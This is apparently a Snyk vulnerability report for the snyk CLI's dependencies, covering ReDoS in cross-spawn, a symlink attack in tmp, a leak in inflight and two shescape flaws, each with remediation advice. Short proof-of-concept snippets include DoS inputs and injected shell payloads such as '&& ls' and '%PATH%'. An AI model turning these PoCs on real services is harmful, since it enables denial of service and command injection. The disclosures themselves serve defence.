Vulnerabilities

 5 via 15 paths

Dependencies

 535

Source

 GitHub

Commit

 14d1f71e

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Issue type
  • 5
  • 1
Severity
  • 1
  • 5
Status
  • 5
  • 0
  • 1

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: cross-spawn
  • Introduced through: snyk-nodejs-plugin@1.4.4

Detailed paths

  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-nodejs-plugin@1.4.4 snyk-nodejs-lockfile-parser@1.58.19 @yarnpkg/core@2.4.0 cross-spawn@7.0.3
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-nodejs-plugin@1.4.4 snyk-nodejs-lockfile-parser@1.58.19 @yarnpkg/core@2.4.0 @yarnpkg/shell@2.4.1 cross-spawn@7.0.3

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

PoC

const { argument } = require('cross-spawn/lib/util/escape');
var str = "";
for (var i = 0; i < 1000000; i++) {
  str += "\\";
}
str += "◎";

console.log("start")
argument(str)
console.log("end")

// run `npm install cross-spawn` and `node attack.js` 
// then the program will stuck forever with high CPU usage

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade cross-spawn to version 6.0.6, 7.0.5 or higher.

References

Regular Expression Denial of Service (ReDoS) vulnerability report

medium severity

Symlink Attack

  • Vulnerable module: tmp
  • Introduced through: @snyk/snyk-hex-plugin@2.1.0, snyk-go-plugin@1.23.0 and others

Detailed paths

  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 @snyk/snyk-hex-plugin@2.1.0 tmp@0.0.33
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-go-plugin@1.23.0 tmp@0.2.1
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-gradle-plugin@5.1.0 tmp@0.2.1
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-python-plugin@3.1.0 tmp@0.2.3
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-sbt-plugin@3.1.0 tmp@0.1.0

Overview

Affected versions of this package are vulnerable to Symlink Attack via the dir parameter. An attacker can cause files or directories to be written to arbitrary locations by supplying a crafted symbolic link that resolves outside the intended temporary directory.

PoC

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

Remediation

Upgrade tmp to version 0.2.4 or higher.

References

Symlink Attack vulnerability report

medium severity

Missing Release of Resource after Effective Lifetime

  • Vulnerable module: inflight
  • Introduced through: glob@7.2.3, rimraf@2.7.1 and others

Detailed paths

  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 glob@7.2.3 inflight@1.0.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-mvn-plugin@4.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-sbt-plugin@3.1.0 tmp@0.1.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-go-plugin@1.23.0 tmp@0.2.1 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-gradle-plugin@5.1.0 tmp@0.2.1 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6

Overview

Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.

Exploiting this vulnerability results in crashing the node process or in the application crash.

Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.

To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.

PoC

const inflight = require('inflight');

function testInflight() {
  let i = 0;
  function scheduleNext() {
    let key = `key-${i++}`;
    const callback = () => {
    };
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }

    setImmediate(scheduleNext);
  }


  if (i % 100 === 0) {
    console.log(process.memoryUsage());
  }

  scheduleNext();
}

testInflight();

Remediation

There is no fixed version for inflight.

References

Missing Release of Resource after Effective Lifetime vulnerability report

medium severity

Improper Neutralization

  • Vulnerable module: shescape
  • Introduced through: snyk-gradle-plugin@5.1.0

Detailed paths

  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-gradle-plugin@5.1.0 shescape@1.6.1

Overview

shescape is a simple shell escape library

Affected versions of this package are vulnerable to Improper Neutralization due to possible escaping the wrong shell, thus allowing attackers to bypass protections. Note: you are only vulnerable if you are using this package on Windows in a threaded context.

PoC

// vulnerable.js

import { exec } from "node:child_process";
import { Worker, isMainThread } from 'node:worker_threads';

import * as shescape from "shescape";

if (isMainThread) {
  // 1. Something like a worker thread must be used. The reason being that they
  // unexpectedly change environment variable names on Windows.
  new Worker("./vulnerable.js");
} else {
  // 2. Example configuration that's problematic. In this setup example the
  // expected default system shell is CMD. We configure the use of PowerShell.
  // Shescape will fail to look up PowerShell and default to escaping for CMD
  // instead, resulting in the vulnerability.
  const options = {
    shell: "powershell",
    interpolation: true,
  };

  // 3. Using shescape to protect against attacks, this is correct.
  const escaped = shescape.escape("&& ls", options);

  // 4. Invoking a command with the escaped user input, this is vulnerable in
  // this case.
  exec(`echo Hello ${escaped}`, options, (error, stdout) => {
    if (error) {
      console.error(`An error occurred: ${error}`);
    } else {
      console.log(stdout);
    }
  });
}

Remediation

Upgrade shescape to version 1.7.4 or higher.

References

Improper Neutralization vulnerability report

medium severity

Information Exposure

  • Vulnerable module: shescape
  • Introduced through: snyk-gradle-plugin@5.1.0

Detailed paths

  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-gradle-plugin@5.1.0 shescape@1.6.1

Overview

shescape is a simple shell escape library

Affected versions of this package are vulnerable to Information Exposure such that an attacker may be able to get read-only access to environment variables.

Note:

This impact users of Shescape:

  1. On Windows using the Windows Command Prompt (i.e. cmd.exe), and
  2. Using quote/quoteAll or escape/escapeAll with the interpolation option set to true.

Workaround

Users who are unable to upgrade to the fixed version can remove all instances of % from user input, either before or after using Shescape.

PoC

import * as cp from "node:child_process";
import * as shescape from "shescape";

// 1. Prerequisites
const options = {
    shell: "cmd.exe",
    // Or
    shell: undefined, // Only if the default shell is CMD

    // And
    interpolation: true, // Only applies to `escape` and `escapeAll` usage
}

// 2. Attack (one of many)
const payload = "%PATH%";

// 3. Usage
let escapedPayload;

escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options);
// Or
escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options);

// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);

// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable

Remediation

Upgrade shescape to version 1.7.1 or higher.

References

Information Exposure vulnerability report

medium severity
ignored

MPL-2.0 license

  • Module: shescape
  • Introduced through: @snyk/snyk-cocoapods-plugin@3.1.0, @snyk/snyk-hex-plugin@2.1.0 and others

  • Ignored path

  • Expires

    in 97 years

Reason

: --about lists all dependency licenses which is a requirement of MPL-2.0

This issue was ignored via the project's .snyk policy file. To unignore it, update the policy file.

Detailed paths

  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 @snyk/snyk-cocoapods-plugin@3.1.0 shescape@2.1.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 @snyk/snyk-hex-plugin@2.1.0 shescape@2.1.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-docker-plugin@8.5.0 shescape@2.1.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-mvn-plugin@4.1.0 shescape@2.1.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-python-plugin@3.1.0 shescape@2.1.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-sbt-plugin@3.1.0 shescape@2.1.6
  • Introduced through: snyk@snyk/snyk#14d1f71ead15206e1b10fdf49bb888ea6752c497 snyk-gradle-plugin@5.1.0 shescape@1.6.1
MPL-2.0 license vulnerability report